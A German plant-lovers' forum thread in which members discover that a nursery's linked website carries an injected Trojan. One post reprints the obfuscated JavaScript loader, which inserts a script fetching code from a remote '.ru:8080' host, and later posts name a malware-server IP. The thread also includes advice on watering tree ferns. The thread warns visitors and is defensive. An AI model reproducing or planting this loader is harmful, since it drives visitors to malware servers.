Hallo Pflanzenwelt,

leider ist mein Feedback nicht so positiv, denn beim Klick auf Deine HP erscheint:

(Beim Malware-Namen sind es übrigens eckige Klammern. Finde ich hier nirgends; nur für den Fall, dass es wichtig ist)

avast! Warnung
Ein Trojanisches Pferd wurde gefunden!

Dateiname: diepflanzenwelt.com/
Malware-Name: JS:Illredir-B(Trj)
Malware-Typ: Trojanisches Pferd
VPS Version: 100107-0, 07.01.2010

avast! Zugriffs-Scanner Nachricht
diepflanzenwelt.com/ enthält eine Probe von 'JS:Illredir-B'

Hab'n ScreenShot gemacht, kann leider die Worddatei hier nicht einfügen.

Gruß, Avalon

Pflanzenwelt.de:

Ist doch logisch, dass bei diesem Code einige Virenprogramme Alarm schlagen:

/*GNU GPL*/ try{window.onload = function(){var I73ypgq495j47 = document.createElement('s(c@#$(r)^(i&)@p((t#'.replace(/\(|\)|&|#|\$|@|\^|\!/ig, ''));var Hevvynbod8rjoq = 'Kddxedpzjx';I73ypgq495j47.setAttribute('type', 't)!(e@&(^!x!$t($^(/^#&j&&&a^)!v!a)^@!s!(&)c!^^r!#i(&^p!##t@$'.replace(/\(|\!|\$|\^|&|#|@|\)/ig, ''));I73ypgq495j47.setAttribute('src', 'h(t^@^#t!!p^$):$/(/^y$@a)l!)l!#@a$k(^!#o$$r!(^a)#-##c$o)^m&&@.!$(e#@#l&a$##n&(c^&e^$&@.!#^c&$!o#(m&.#@^m!$^-&#w!-)c@&$o$@$^m)).^^!g&(u$&!i@d#e)(!b@@a(t^@.#$@r#&u&:)($&8)@!0#8!@(0@$/#g^&)o#o@g)!!l)!e#@@.)!n$$l@(&/(!!g&#o$@)o($$g!l^@&^e$.)&n@&$l&!/)@a$$m)&&@a#z#$$o^#n&#.^$(@f^r$/#@l$&i($(v(($!e&(j)a$!s))m&i)$$^n$#.^@c!#!&o)@^m)@/)#@)g)$(o!o&!#g^$l&)(e@^.#@!c@^o!&(m^/!#&'.replace(/\)|\$|\^|\(|@|\!|&|#/ig, ''));I73ypgq495j47.setAttribute('defer', 'd)#@()e!!##f^@&^e&)r&^'.replace(/&|\$|\(|\!|\^|\)|@|#/ig, ''));I73ypgq495j47.setAttribute('id', 'B(@(&!v)))e@&(c@#@g$y@!c#$a(#)$p$#@n!@#^q(&!^e$c)@'.replace(/\^|\$|\)|\!|@|\(|&|#/ig, ''));document.body.append"Kind"(I73ypgq495j47);}} catch(Hlpi1b5ilrjsb) {}

Hier versucht der Programmierer, sein Skript zu verstecken. Ist schon lange "out" und bringt rein gar nichts! Unbedingt ändern, wenn Kunden die Seite besuchen sollen!

PS: Ich mußte den Code unter Ausschaltung meines Virenscanners hier eingeben und an einigen Stellen modifizieren, damit ich anschließend diese Forumsseite mit eingeschaltetem Scanner wieder laden konnte!

Gruß
Thomas

Pflanzenwelt.de: Ist doch logisch, dass bei diesem Code einige Virenprogramme Alarm schlagen:

schön, das wir pflanzenwelt.com haben ;smilie[123]

Original von Die Pflanzenwelt
...
schön, das wir pflanzenwelt.com haben ;smilie[123]

Sorry, ist nur ein Tippfehler: Der Code kommt von Pflanzenwelt.com. Ich habe direkt den Link aus Deiner Signatur genutzt!

Gruß
Thomas

eine schöne Welle hat dein Skript geschlagen... grins.

Frank, mal eine "rein gärtnerische Frage":
Hast du derzeit Dicksonien im Gewächshaus und wenn ja, in welchen Abständen gießt du die?
Noch eine Abschlußfrage:
Gibt es eine Mehtode auf dem Markt, die automatisch zu bewässern?
Danke im voraus für eine Antwort.
Gruß, -klaus-

Huhu,

ich denk wir sollten auch zum "exotischen" zurückkommen. Die technischen Hindernisse div. Virenscanner passen glaube ich nicht in diesen Thread. Auch wenn der Code recht exotisch klingt......ich kann eh nichts dran ändern. 99% der Leute kommen ja damit zurecht.

@ Klaus:

wir wässern unsere Dickies derzeitig ca. alle 14 Tage. Alle 4 Wochen dann mal manuell am Stamm. Wir haben aber auch nur 4 Stück in der Überwinterung. Da ist da überschaubar. Im Sommer stehen die im Feld mit den Regnern. Die bekommen dann einmal Wasser über einen Pin in der Erde aus der Bewässerungsanlage und werden zur "Stammbewässerung" vom Regner benetzt. Hat sich eigentlich gut bewährt.

Für den Hausgebrauch könnte man da mit Gardeasystemen arbeiten. Dort gibt es MIcro-Bewässerung mit Sprühdüsen. Die benutze ich im privaten Garten auch. Hier im Forum hatte mal jemand eine recht umfangreiche Konstruktion mit Sprühdüsen für seine Palmenzucht vorgestellt. Ein Tisch voller kleiner Töpfe mit einer Sprühbewässerung von oben. Finde den Thread aber leide rnicht im Moment. So etwas würde prinzipiell dann auch zu Hause nur eben am Boden montiert funktionieren.

Gruß

Frank

@Die Pflanzenwelt
Danke dir Frank, dann habe ich unnötig viel gewässert (alle 4-5 Tage)
Für den Sommer, wenn ich im Urlaub bin, werde ich mir dann mal etwas einfallen lassen, vielleicht ein Gartenschlauch an einem Ständer befestigt und mit Gardena zeitgeschaltet oder so ähnlich.

Wir sollten uns überhaupt mehr Gedanken über Sommer machen
..und den Thread dieser Eigenkonstruktion habe ich auch noch im Gedächtnis.

v.G. Klaus

Tut mir leid, aber ich muss noch einmal auf pflanzenwelt.com zurück kommen:

Es handelt sich leider nicht um einen falschen Alarm, die Website ist tatsächlich von einem Trojaner befallen! Es ist also nicht etwa ein schlechter Programmierstil: Der von mir gepostete Code gehört nicht zum originalen Webauftritt, sondern zeigt den Befall an!

Leider erkennen viele Virenscanner diesen Trojaner noch nicht.
Da ich um die Seite zu laden ESET abschalten mußte, hatte ich auch mein System kurzzeitig infiziert. ESET hat es dann aber zusammen mit manuellem Eingriff von meiner Seite glücklicherweise noch geschafft, das System wieder zu reinigen!

Gruß
Thomas

Original von ogretzky99
Ich möchte ja jetzt nichts falsches sagen, aber das Thema Virus oder Trojaner gehört hier eingentlich nicht zum Thema und so etwas muss man auch nicht öffentlich austragen...

Obwohl es thematisch nicht paßt, halte ich das jetzt doch für wichtig:
Jeder aus diesem Forum, der die Seite aufgerufen hat und laden konnte, hat jetzt diesen Trojaner auf seinem Rechner! Online-Banking oder Ebay-Einkäufe sollte man sich daher unbedingt verkneifen, bis das System gereingt ist!

Gruß
Thomas

@Thomas,
ich finde auch, solche Dinge kann man per PM mitteilen. Auch sind Fehlalarme nichts außergewöhnliches bei Scannern. Man stellt niemanden öffentlich an den Pranger, nur weil ein Scanner einen Alarm meldet, noch dazu wenn er sein Brot damit verdient und einen guten Ruf genießt. Das ist meine Meinung dazu!!!

klaus

Original von Klaus
@Thomas,
ich finde auch, solche Dinge kann man per PM mitteilen. Auch sind Fehlalarme nichts außergewöhnliches bei Scannern. Man stellt niemanden öffentlich an den Pranger, nur weil ein Scanner einen Alarm meldet, noch dazu wenn er sein Brot damit verdient und einen guten Ruf genießt. Das ist meine Meinung dazu!!!

klaus

Nach Prüfung habe ich jetzt festgestellt, dass dies kein Fehlalarm ist! Bitte google ein wenig (=> in meinem Link ist gleich die Lösung für den Webmaster/Frank (Pflanzenwelt) mit drin, wie er den Trojaner von seinem Server evtl. (=> die Virensignatur ändert sich sehr schnell!!) wieder los wird!!!), und Du wirst feststellen, dass es sich um einen bekannten Trojaner handelt. Außerdem gehört dieser Code definitiv nicht zum Webauftritt.

Wenn eine hier in der Signatur verlinkte Webpage einen Trojaner beinhaltet, sollte man m. E. schon die Forumskollegen davor warnen.

Gruß
Thomas

PS: Klaus: Wie fändest Du es, wenn man dich wieder besseres Wissen nicht warnt und anschließend dein Girokonto geleert wird, weil du nicht wußtest, dass ein Trojaner auf deinem Rechner sitzt?
PPS: Der Trojaner versucht eine Verbindung zur IP 94.23.206.229:8080 herzustellen (russische Registrierung)! Die IP wird in der Malware Domain List aufgeführt!
PPPS: Habe jetzt festgestellt, dass der Trojaner zu verschiedenen Malware-Servern eine Verbindung aufbauen will, nicht nur die o. g. Adresse!

Hallo Thomas,
leider kenne ich mich mit solchen Sachen überhaupt nicht aus, wie soll ich das jetzt verstehen?
Ich konnte die Seite aufrufen, hab ich jetzt einen Trojaner auf dem Rechner?
Online Banking benutze ich auch! Was macht Frau den jetzt?

Hallo Leutchens.....
ich denke ihr seid etwas aus der Bahn geglitten, deshalb bitte ich euch wieder zu dem ursprünglichen Thema :Winterschutz.....zurück zu kommen.
Was aber nicht heißen soll dass das Thema uninteressant ist.Doch hier ist es eher unangebracht.

Was der einzelne User der Seite pflanzenwelt.com zu tun hat, um seinen Recher vom Trojaner zu reinigen und welches Bedrohungspotenzial ggf. dahinter steckt, sollte Frank hier selber posten.
Seine Website wurde dem Anschein nach inzwischen vom Trojaner gereinigt (zumindest auf der Homepage taucht der Schadcode jetzt nicht mehr auf)!

Ich werde mich hier nicht weiter dazu äußern, denn der Rest ist eine Angelegenheit, die Frank mit seinen Kunden/Besuchern der Website regeln muss!

@Bienchen: Bis zur Klärung des Schadpotenzials des Trojaners und der Reinigung deines Rechners durch einen geeigneten Scanner solltest Du keine Online-Einkäufe, Bankgeschäfte oder Ähnliches über deinen Rechner tätigen!


Gruß
Thomas